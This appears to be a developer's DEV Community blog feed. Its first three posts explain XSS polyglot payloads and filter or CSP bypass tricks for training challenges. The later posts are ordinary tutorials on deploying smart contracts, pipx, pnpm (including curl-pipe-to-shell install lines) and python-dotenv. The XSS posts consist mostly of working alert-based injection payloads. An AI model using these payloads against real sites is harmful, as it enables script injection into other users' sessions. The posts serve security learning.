DEV Community: Mrhili Mohamed Amine

Polyglot solve most of Training XSS Muscles Challenge

Mrhili Mohamed Amine — Sat, 14 Sep 2024 00:43:27 +0000

JavaScript://%250Aalert?.(1)//
'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>
\74k<K/contentEditable/autoFocus/OnFocus=
/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->

Core Idea:
This payload is designed to bypass several XSS filters and security mechanisms by working in various HTML contexts. It uses a combination of HTML and JavaScript tricks to inject a malicious payload, such as the alert() function, in a variety of ways.

Top-Level Concepts:
Polyglot Basics:
A polyglot is a payload that can execute in multiple contexts, typically both in HTML, attributes, or JavaScript contexts, making it more versatile for exploiting XSS vulnerabilities.
The goal of this payload is to inject JavaScript and execute alert(1) across multiple contexts while bypassing filters.
Polyglot Sections:
JavaScript Execution with Optional Chaining:

JavaScript://%250Aalert?.(1)//

The JavaScript protocol triggers the payload in browsers that interpret JavaScript from URL protocols.
%250A is the URL-encoded form of a newline character (\n), used to bypass URL validation or escape filters.
alert?.(1) is an optional chaining syntax in JavaScript. It executes alert(1) if alert exists, bypassing strict checks on direct calls to alert().
// terminates the rest of the payload as a comment to avoid errors.
HTML Tag Breakouts:

</Title/</Style/</Script/</textArea/</iFrame/</noScript>

This section attempts to break out of various HTML tags like <title>, <style>, <script>, <textarea>, and others.
It ends the tags early (</...>) so that JavaScript can be executed right after the tag, bypassing filtering or restrictions based on tag contexts.
It’s compact since it doesn’t close each tag properly; just one closing symbol (>) suffices for all.
Quote Breakouts:

/*'/*\'/*"/*\"/*\/%26apos;)/<!-->`

This section handles breaking out of quote contexts (", ', `). It uses JavaScript comments(/.../) to inject and terminate multiline comment blocks that might be initiated by filters.
/.../ is useful for multiline comments and ignoring filter checks.
%26apos;) is an HTML entity escape code for ', used to break out of attributes or string contexts that use HTML entities for sanitization.
Event Handler and Execution:

` \74k<K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1)}//> `
\74k<K is a trick to insert an arbitrary tag where \74 is the octal representation of <. This works to bypass filters that sanitize < by converting it into an octal entity.
K is an arbitrary tag (can be any character) with the attributes contentEditable, autoFocus, and OnFocus.
The OnFocus=/**/{(alert)(1)} ensures that when the element gains focus, it executes the alert(1) function.
Advanced Evasion Techniques:

` <Base/Href=//X55.is\76--> `
<Base> is used for CSP bypass. If the base URL is set to a malicious domain like //X55.is, relative URL references to scripts or assets can trigger cross-origin requests, executing external malicious scripts.
/76 is the octal code for >, and it's used to properly close the tag while bypassing filters that escape < and >. This is part of the trick where octal escapes are converted back into characters.
HTML Comment Insertion:

<!--> is a simple HTML comment injection that ends any HTML comment block started by a filter, allowing the payload to escape the context.
Polyglot Logic:
Bypassing HTML Filters: The polyglot uses tag closings, quote breakouts, and event handlers to escape multiple HTML tags and execute JavaScript in different contexts.
Bypassing JavaScript Filters: Through commenting techniques (/.../, //) and quote escapes, it handles multiline scripts and prevents syntax errors.
Filter Evasion: By using HTML entities, optional chaining, and octal escapes, it bypasses common sanitization filters and CSP rules.
Mind Map Summary:
Polyglot Core:
JavaScript Execution (alert?.(1))
HTML Context Breakouts ()
JavaScript String Injection:
Escape Quotes (/'/\'/"/)
Inline Comments and Multiline Escapes (//, /.../)
HTML Tag Evasion:
Tag Close Breakouts ()
Arbitrary Tag Injection with Event Handler ()
Advanced Tricks:
Octal Encoding for < and > (\74 and \76)
CSP Bypass using and external URL (Base/Href=//X55.is)
Final Injection:

Mixed context polyglot triggering across multiple browsers and scenarios.
This polyglot is highly effective in breaking out of multiple contexts, evading JavaScript string handling and HTML tag closures, and executing in both

Creating Powerful XSS Polyglots

Mrhili Mohamed Amine — Fri, 13 Sep 2024 10:11:31 +0000

Polyglot payloads leverage multiple encoding, injection, and obfuscation techniques to bypass filters, confuse parsers, and trigger execution across different contexts like HTML, JavaScript, CSS, JSON, etc.

-Merging Comment Styles
Polyglots often confuse parsers by merging different comment styles:

JavaScript: //, /* */
HTML: <!-- -->

<!--<script>/*--><svg onload=alert(1)/*</script>-->

-Using Encoded Entities
Bypassing filters using HTML or URL encoding:

HTML: &lt;, &gt;, &quot;
URL: %3C, %3E, %22

&lt;script&gt;alert(1)&lt;/script&gt;

-Multiple Language Contexts
Polyglot payloads work across multiple languages like HTML, JavaScript, CSS.

"><svg onload=alert(1) style="background:url(javascript:alert(1))"><!--

-Breaking Out of Contexts
Escape from current contexts like textarea, script, or style.

</textarea><svg onload=alert(1)>

-Abusing HTML5 Elements
Using modern elements like , , or .

<svg onload=alert(1)></svg>
<iframe srcdoc="<svg onload=alert(1)>"></iframe>
<math><mtext><script>alert(1)</script></mtext></math>

-Contextual Event Handlers
Inject event handlers into HTML tags like onload, onmouseover.

<div class="x" onmouseover="alert(1)">

-Combining HTML, JavaScript, and CSS
Mixing contexts of HTML, CSS, and JavaScript.

</style><script>alert(1)</script><style>

-Utilizing SVG and XML Features
SVG allows injection via JavaScript URIs and other XML-based features.

<svg><image href="javascript:alert(1)"></svg>

-Protocol Confusion (Data URLs, JavaScript URLs)
Use javascript: or data: URLs for payload delivery.

<a href="javascript:alert(1)">Click me</a>

<iframe src="data:text/html;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+"></iframe>

-Breaking with Newline Characters
Using newlines \n or carriage returns \r to bypass filters.

"onmouseover=\nalert(1)//"

-Polyglot Structures
Payloads that work across multiple languages like CSS and JavaScript.

*/ alert(1) /*

-UTF-7 Encoding
Using less common encodings like UTF-7.

+ADw-script+AD4-alert(1)+ADw-/script+AD4-

-Using HTML5 Injection Vectors
Use modern HTML5 vectors like srcdoc, formaction, or sandbox.

<iframe srcdoc="<script>alert(1)</script>"></iframe>

-Multiple Closings & Layering
Close different tags to break out of nested contexts.

</textarea></script></iframe><svg onload=alert(1)>

Best Practices for Polyglot Payloads
Diversify Attack Vectors: Use multiple elements like , , <script>.<br> Encoding: Use HTML or URL encoding to bypass filters.<br> Event Handlers: Combine with event handlers like onmouseover, onload.<br> Context Escaping: Focus on breaking out of strings, attributes, or tags.<br> Minimize Payload Length: Keep payloads short to bypass length restrictions.<br> These techniques show how polyglot payloads can bypass modern filters by using multiple languages and contexts.</p>

What is a polyglot in Hacking

Mrhili Mohamed Amine — Fri, 13 Sep 2024 09:43:49 +0000

Polygloting in language is talking two languages or more

Polygloting in hacking is like testing two thing or more in the same time

XSS Polyglots: Technical Payloads
Basic Polyglot Example
Escape common string filters in both HTML and JavaScript contexts.

<img src=x onerror="';alert(1)//">

This works in cases where an input is included in both JavaScript and HTML, bypassing simple quote escapes.

Escaping Multiple Contexts
HTML + JavaScript + SQL:

';alert(1);//--><img src=x onerror=alert(1)>"

Exploits SQL injection followed by triggering a JavaScript alert within HTML.

Injecting Through HTML Attributes
Use different HTML elements and attributes to escape.

<div class="{{payload}}"></div>
<script type="text/javascript">{{payload}}</script>
<style>{{payload}}</style>
<textarea>{{payload}}</textarea>

Polyglot Payload:

" onmouseover=alert(1)//
' onmouseover=alert(1)//
</textarea><svg onload=alert(1)>"

XSS via Multiple HTML Tags
Expand attack vectors by targeting various HTML tags:

<noscript>{{payload}}</noscript>
<noembed>{{payload}}</noembed>
<template>{{payload}}</template>
<select><option>{{payload}}</option></select>

Polyglot Payload:

" onmouseover=alert(1)// 
' onmouseover=alert(1)// 
</textarea><svg onload=alert(1)>
</style><svg onload=alert(1)>

XSS in HTML Comments
Even comments can be abused if not properly sanitized.

<!--{{payload}}-->

Polyglot Payload:

--><svg onload=alert(1)>

Advanced Payload Combination
Combine various contexts to craft a versatile polyglot:

<div class="{{payload}}"></div>
<textarea>{{payload}}</textarea>
<style>{{payload}}</style>
<script>{{payload}}</script>
<!--{{payload}}-->

Ultimate Polyglot Payload:

" onmouseover=alert(1)//
' onmouseover=alert(1)//
<img src onerror=alert(1)>
</textarea><svg onload=alert(1)>
</style><svg onload=alert(1)>
</noscript><svg onload=alert(1)>
</noembed><svg onload=alert(1)>
--><svg onload=alert(1)>

Obfuscated Payload
Use HTML entities or JavaScript obfuscation to bypass filters:

<svg/onload='&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;'>

JSON + XSS Polyglot
If the payload is passed into JSON:

{"key":"\"},\"anything\":\"<img src=x onerror=alert(1)>//"}

This closes the JSON key, injects the XSS, and continues the valid JSON.

Conclusion
These payloads represent different ways of exploiting XSS vulnerabilities using polyglots. By targeting multiple contexts—such as attributes, scripts, and comments—you increase your chances of bypassing filters and exploiting vulnerabilities effectively.

This approach makes it versatile, with focus on injecting through multiple contexts using minimal characters.

Protecting My Email and Phone from Bots on My Website: A Simple HTML Approach

Mrhili Mohamed Amine — Mon, 11 Sep 2023 22:33:32 +0000

In today's digital age, maintaining online privacy has become increasingly important. As a website owner, one of my top priorities is safeguarding personal information from malicious bots that can scrape email addresses and phone numbers. In this blog post, I'll walk you through a simple HTML approach I've taken to obfuscate my email and phone numbers on my website.

The Challenge

Bots and web crawlers are constantly scouring the internet for email addresses and phone numbers to send spam or use for other malicious purposes. To combat this, I needed a way to display my contact information on my website while making it difficult for bots to extract that information.

The Solution

To address this issue, I turned to HTML and CSS for a straightforward and effective solution. Let's take a look at how I obfuscated my email and phone numbers using simple HTML tags and CSS classes.

<div class="about-info">
    <p><span class="title-s">Name</span> <span>Amine Online</span></p>
    <p><span class="title-s">Profile:</span> <span>Multifaceted</span></p>
    <p>
        <span class="title-s">Email<span class="at-symbol">&#64;</span>hotmail.com</span> is -&gt;
        <span class="email">amine-ghandi</span>
    </p>
    <p>
        <span class="title-s">Phone: +212</span>
        <span class="phone">6-33<span class="hash-symbol">#</span>49-42<span class="hash-symbol">#</span>75</span>
    </p>
</div>

Obfuscating Email

To obfuscate the email address, I broke it into two parts: the username (amine-ghandi) and the domain (hotmail.com). I used the arrow -> as -&gt to point at the username and the <span class="at-symbol">@</span> to draw the @ symbol.

Obfuscating Phone Number

Similarly, I obfuscated the phone number by splitting it into segments using the phone class and added a CSS class (hash-symbol) to display "#" symbols between the segments. This makes it challenging for bots to recognize it as a phone number.

Benefits of This Approach

By using simple HTML and CSS, I've made it more difficult for bots to harvest my email address and phone number. While this method may not provide foolproof protection, it adds an extra layer of security to my online presence without the need for complex coding or images.

Conclusion

Protecting your email and phone number from bots on your website is essential to maintaining online privacy. This HTML approach provides a practical and user-friendly way to obfuscate your contact information, helping you stay one step ahead of malicious web crawlers. Consider implementing this technique on your website to enhance your online security effortlessly.

Save time developing smart-contracts with brownie

Mrhili Mohamed Amine — Tue, 21 Jun 2022 03:10:55 +0000

Seting up the Environment

First download python in my windows machine using the link below

https://www.python.org/

The most important thing is to get the build tools necessary for the web3 library in my case i needed V++ 2019 build tools

Use the link bellow and scroll down to Tools for Visual Studio to get the online installer and install the needed version

https://visualstudio.microsoft.com/downloads/?q=build+tools

Get a metamask wallet for the test only and create an account and register down

the passphrase, Account adress, The private keys

in the metamask network section reveal the testnet because we will use rinkbey test for this purpose

Get some etherium for the test using youre metamasc wallet here:

https://www.youtube.com/watch?v=qsvwg-cC928

https://faucets.chain.link/

Create an account in https://infura.io/

Create a project and name it however you like Just dont forget to turn the rinkby network after the creation process.
and write down the Project_id and the Project secret and the first endpoint

If you dont like Infura you can use : https://t.co/Ky3JWP8GPZ

Install Visualstudio code in the link bellow

https://code.visualstudio.com/

Install some usefull extensions for solidity and python

Open a new project and start creatingthose files:

.env
brownie-config.yaml

You dont need to create a virtual environement just install pipx with administrator rules:

python -m pip install --user pipx

reopen powershell and continue

python -m pipx ensurepath

reopen powershell and install brownie

pipx install eth-brownie

reopen powershell again and init required files for brownie

brownie init

Now you have those new folders

build
contracts
interfaces
reports
scripts
tests

Environement variable

Add a required environement variable with the name

WEB3_INFURA_PROJECT_ID
most be equal to youre INFURA_ID in the project created

SimpleStorage.sol

The code for the SimpleStorage.sol is :
create the file under contracts folder



 // SPDX-License-Identifier: MIT

pragma solidity >=0.6.0 <0.9.0;

contract SimpleStorage {

    uint256 favoriteNumber;

    // This is a comment!
    struct People {
        uint256 favoriteNumber;
        string name;
    }

    People[] public people;
    mapping(string => uint256) public nameToFavoriteNumber;

    function store(uint256 _favoriteNumber) public {
        favoriteNumber = _favoriteNumber;
    }

    function retrieve() public view returns (uint256){
        return favoriteNumber;
    }

    function addPerson(string memory _name, uint256 _favoriteNumber) public {
        people.push(People(_favoriteNumber, _name));
        nameToFavoriteNumber[_name] = _favoriteNumber;
    }
}

In the code above we just have a favoriteNumber variable that we can check with retrieve function and modify with the store functionand we can associate someone name with a favorite number with addPerson function

Deploy.py

the code of the deploy.pyshould be the same as:
create the file under scripts folder

#Security
from dotenv import load_dotenv

#Necessary



from brownie import accounts, config, SimpleStorage, network





def get_account():

    if network.show_active() == "development":
        return accounts.add(config["wallets"]["from_key"])
    else:
        return accounts.add(config["wallets"]["from_key_metama"])

def deploy_ss():


    print("ACCOUNT  =>",get_account())

    ss= SimpleStorage.deploy({"from": get_account()})

    trx = ss.store(7, {"from": get_account()})

    trx.wait(1)

    fav = ss.retrieve()


    print("FAV NOW   =>",fav)




def main():


    deploy_ss()

In the code above we are deploying the smart contract in the blockchain and interacting with it by storing the number 7 in favoriteNumber and the checking it

.env/Private keys

Now we should fill the necessary keys, you can escape the first two variables because it only needed in a local interaction with Ganache

.env file

ACCOUNT="0xRandom3216547986549687"
PRIVAT_KEY="0xRandom3216547986549687"


INFURA_ID="654random65465"
INFURA_SEC="654random65465"

META_ADRESS="0x654random65465"
META_PRV="654random65465"

ENDPOINT_RINKBY="654random65465"

ENV_TYPE="INFURA"

Configs

In the file brownie-config.yaml load where .env file are abd what the variable name for the private key

dotenv: "../.env"


wallets:
  from_key: ${PRIVAT_KEY}
  from_key_metama: ${META_PRV}

Deploying/Interaction

You just need a final step is running :

brownie run scripts/deploy.py --network rinkeby

I hope everything fine

if so check you contract here :

https://rinkeby.etherscan.io/address/write_the_adress_of_the_contract

you can get the contract adress with the info given by youre brownie output

SimpleStorage deployed at: 0xsdfsdfrandomsdfsdf

for the needygreedy tutorialplease follow it here:

Tired of creating virtual environement each time?

Mrhili Mohamed Amine — Thu, 16 Jun 2022 02:00:30 +0000

pipx is a package manager that you can use to create sandboxes and you can call them everytime you need them, no need to create a virtual environement evrytime you create a new project.

python3 -m pip install --user pipx

python3 -m pipx ensurepath

you can start using it like pip with the command :

python3 -m pipx install ?PACKAGE2INSTALL?

Ho i managed to put my first etherium smart-contract on a testnet using python

Mrhili Mohamed Amine — Thu, 16 Jun 2022 01:11:23 +0000

Seting up the Environment

First i downloaded python in my windows machine using the link below

https://www.python.org/

The most important thing is to get the build tools necessary for the web3 library in my case i needed V++ 2019 build tools

Use the link bellow and scroll down to Tools for Visual Studio to get the online installer and install the needed version

https://visualstudio.microsoft.com/downloads/?q=build+tools

Get a metamask wallet for the test only and create an account and register down

the passphrase, Account adress, The private keys

in the metamask network section reveal the testnet because we will use rinkbey test for this purpose

Get some etherium for the test using youre metamasc wallet here:

https://www.youtube.com/watch?v=qsvwg-cC928

https://faucets.chain.link/

Create an account in https://infura.io/

Create a project and name it however you like Just dont forget to turn the rinkby network after the creation process.
and write down the Project_id and the Project secret and the first endpoint

If you dont like Infura you can use : https://t.co/Ky3JWP8GPZ

Install Visualstudio code in the link bellow

https://code.visualstudio.com/

Install some usefull extensions for solidity and python

Open a new project and start creatingthose files:

deploy.py
SimpleStorage.sol
.env

create a virtual env and we will name it 'venv' with this command :

py -m venv venv

start using it now with this command each time you you open the powershell with :

venv\Scripts\activate

start installing the necessary libraries

pip install web3
pip install python-dotenv
pip install py-solc-x

SimpleStorage.sol

The code for the SimpleStorage.sol is :



 // SPDX-License-Identifier: MIT

pragma solidity >=0.6.0 <0.9.0;

contract SimpleStorage {

    uint256 favoriteNumber;

    // This is a comment!
    struct People {
        uint256 favoriteNumber;
        string name;
    }

    People[] public people;
    mapping(string => uint256) public nameToFavoriteNumber;

    function store(uint256 _favoriteNumber) public {
        favoriteNumber = _favoriteNumber;
    }

    function retrieve() public view returns (uint256){
        return favoriteNumber;
    }

    function addPerson(string memory _name, uint256 _favoriteNumber) public {
        people.push(People(_favoriteNumber, _name));
        nameToFavoriteNumber[_name] = _favoriteNumber;
    }
}

In the code above we just have a favoriteNumber variable that we can check with retrieve function and modify with the store functionand we can associate someone name with a favorite number with addPerson function

Deploy.py

the code of the deploy.pyshould be the same as:

#Necessary
import json
import os
from pathlib import Path

#Security
from dotenv import load_dotenv

#Web3
from solcx import compile_standard, set_solc_version
from web3 import Web3






#Get hidden variables

load_dotenv(Path('.env'))

ENV_TYPE = os.getenv('ENV_TYPE')
#GANACHE
PRIVATE_KEY = os.getenv('PRIVAT_KEY')
ACCOUNT = os.getenv('ACCOUNT')

#INFURA
INFURA_ID = os.getenv('INFURA_ID')
INFURA_SEC = os.getenv('INFURA_SEC')
ENDPOINT_RINKBY = os.getenv('ENDPOINT_RINKBY')
#METAMASK
META_ADRESS = os.getenv('META_ADRESS')
META_PRV = os.getenv('META_PRV')


#SETUP THE CONTRACT

with open(Path('SimpleStorage.sol'), "r") as f:


    ss_file = f.read()



_solc_version = "0.6.0"

compiled_ss = compile_standard({
    "language":"Solidity","sources": {"SimpleStorage.sol": {"content": ss_file}},
    "settings":{
        "outputSelection":{
            "*":{
                "*":["abi", "metadata", "evm.bytecode","evm.sourceMap"]
            }
        }
    }

}, solc_version ="0.6.0")


with open(Path('compiled.json'), 'w' ) as f:

    json.dump(compiled_ss, f)

#get bytecode
bytecode= compiled_ss["contracts"]["SimpleStorage.sol"]["SimpleStorage"]["evm"]["bytecode"]["object"]
#get ABI
abi= compiled_ss["contracts"]["SimpleStorage.sol"]["SimpleStorage"]["abi"]


#SETUP PRIVATE KEYS

if ENV_TYPE == "INFURA":

    w3 = Web3(Web3.HTTPProvider(ENDPOINT_RINKBY))
    chain_id = 4

    my_address = META_ADRESS
    private_key = META_PRV

else:

    w3 = Web3(Web3.HTTPProvider("HTTP://127.0.0.1:8545"))
    chain_id = 1337

    my_address = ACCOUNT
    private_key = PRIVATE_KEY




ss = w3.eth.contract(abi=abi, bytecode=bytecode)


if  w3.isConnected():
    # print(ss)

    #get latest transaction to build the nounce
    nonce=w3.eth.getTransactionCount(my_address)
    #build transact
    #sign
    #send transact
    deploy_transaction = ss.constructor().buildTransaction({"gasPrice": w3.eth.gas_price,"chainId": chain_id, "from": my_address, "nonce": nonce})

    nonce = nonce+1    
    #Sign transaction
    signed_txn = w3.eth.account.sign_transaction(deploy_transaction, private_key=private_key)


    #send to blockchain

    print("deploying contract ...")

    txn_hash =  w3.eth.send_raw_transaction( signed_txn.rawTransaction )

    tx_receipt = w3.eth.wait_for_transaction_receipt(txn_hash)

    print("tx_receipt =>", tx_receipt)

    ##Contract adress and ABI

    contract_adress = tx_receipt.contractAddress

    #for interaction
    #transact or call

    ss_contract =  w3.eth.contract(address=contract_adress, abi=abi)


    store_transaction = ss_contract.functions.store(7).buildTransaction({"gasPrice": w3.eth.gas_price,"chainId": chain_id, "from": my_address, "nonce": nonce})


    signed_store_txn = w3.eth.account.sign_transaction(store_transaction, private_key=private_key)


    #send to blockchain

    print("interacting with store function ...")

    txn_store_hash =  w3.eth.send_raw_transaction( signed_store_txn.rawTransaction )

    tx_store_receipt = w3.eth.wait_for_transaction_receipt(txn_store_hash)

    print("tx_store_receipt =>", tx_store_receipt)

    print("---")

    print("call retreive =>", ss_contract.functions.retrieve().call())







else:

    print("Error not conected")

    quit()

In the code above we are creating the smart contractin the blockchain and interacting with it by storing the number 7 in favoriteNumber and the checkingit

.env/Private keys

Now we should fill the necessary keys, you can escape the first two variables because it only needed in a local interaction with Ganache

.env file

ACCOUNT="0xRandom3216547986549687"
PRIVAT_KEY="0xRandom3216547986549687"


INFURA_ID="654random65465"
INFURA_SEC="654random65465"

META_ADRESS="0x654random65465"
META_PRV="654random65465"

ENDPOINT_RINKBY="654random65465"

ENV_TYPE="INFURA"

Deploying/Interaction

You just need a final step is running :

py deploy.py

I hope everything fine

if so check you contract here :

https://rinkeby.etherscan.io/address/write_the_adress_of_the_contract

you can get the contract adress with the info given by youre python output

'contractAddress': '0x21321random321321'

for the needygreedy tutorialplease follow it here:

Error: Cannot find module 'core-util-is'

Mrhili Mohamed Amine — Tue, 14 Jun 2022 23:29:10 +0000

This npm error can be solved via another package manager, in this article we will solve it with the command

pnpm install --save core-util-is

If you dont have pnpm in youre environement please follow our article : https://dev.to/mrhili/what-is-pnpm-2l87

What is pnpm?

Mrhili Mohamed Amine — Tue, 14 Jun 2022 23:21:13 +0000

PNPM try to be fast and use symlink for duplicated files so try it

The fastest way to install pnpm is to have node.js version >=16.10

to do the easiest command:

corepack enable

if less

npm i -g corepack

if those command dont work and you are in windows use this command in powershell :

iwr https://get.pnpm.io/install.ps1 -useb | iex

in macOS or linux using curl or wget , youre choice:

wget -qO- https://get.pnpm.io/install.sh | sh -

curl -fsSL https://get.pnpm.io/install.sh | sh -

Create fake blockchaine to test youre smart-contract

Mrhili Mohamed Amine — Tue, 14 Jun 2022 22:36:31 +0000

To create a fake blockchain wich you can test youre smartcontract written with Solidity you need Ganach software or a Ganache CLI.

Ganache is the latest version of TestRPC: a fast and customizable blockchain emulator. It allows you to make calls to the blockchain without the overheads of running an actual Ethereum node.

Usage

Transactions are “mined” instantly.
No transaction cost.
Accounts can be re-cycled, reset and instantiated with a fixed amount of Ether (no need for faucets or mining).
Gas price and mining speed can be modified.
A convenient GUI gives you an overview of your testchain events.

To install ganache software visite this website : https://trufflesuite.com/ganache/

To get ganache-cli you need Node.js first

Installation

Install it here: https://nodejs.org/

Ganache can be installed via NPM:

npm install -g ganache-cli

Using Ganache CLI
Command Line

$ ganache-cli <options>

Note

If you have trouble using npm please try pnpm it save me alot.
I have a post discussing pnpm here: https://dev.to/mrhili/what-is-pnpm-2l87.

Python .env

Mrhili Mohamed Amine — Tue, 14 Jun 2022 01:08:26 +0000

If your application takes its configuration from environment variables, like a 12-factor application, launching it in development is not very practical because you have to set those environment variables yourself.

pip install python-dotenv

To help you with that, you can add Python-dotenv to your application to make it load the configuration from a .env file when it is present (e.g. in development) while remaining configurable via the environment:

from dotenv import load_dotenv

load_dotenv()  # take environment variables from .env.

Code of your application, which uses environment variables (e.g. from os.environ or
os.getenv) as if they came from the actual environment.
By default, load_dotenv doesn't override existing environment variables.

To configure the development environment, add a .env in the root directory of your project:

. ├── .env └── foo.py

The syntax of .env files supported by python-dotenv is similar to that of Bash:

# Development settings
DOMAIN=example.org
ADMIN_EMAIL=admin@${DOMAIN}
ROOT_URL=${DOMAIN}/app

If you use variables in values, ensure they are surrounded with { and }, like ${DOMAIN}, as bare variables such as $DOMAIN are not expanded.

You will probably want to add .env to your .gitignore, especially if it contains secrets like a password.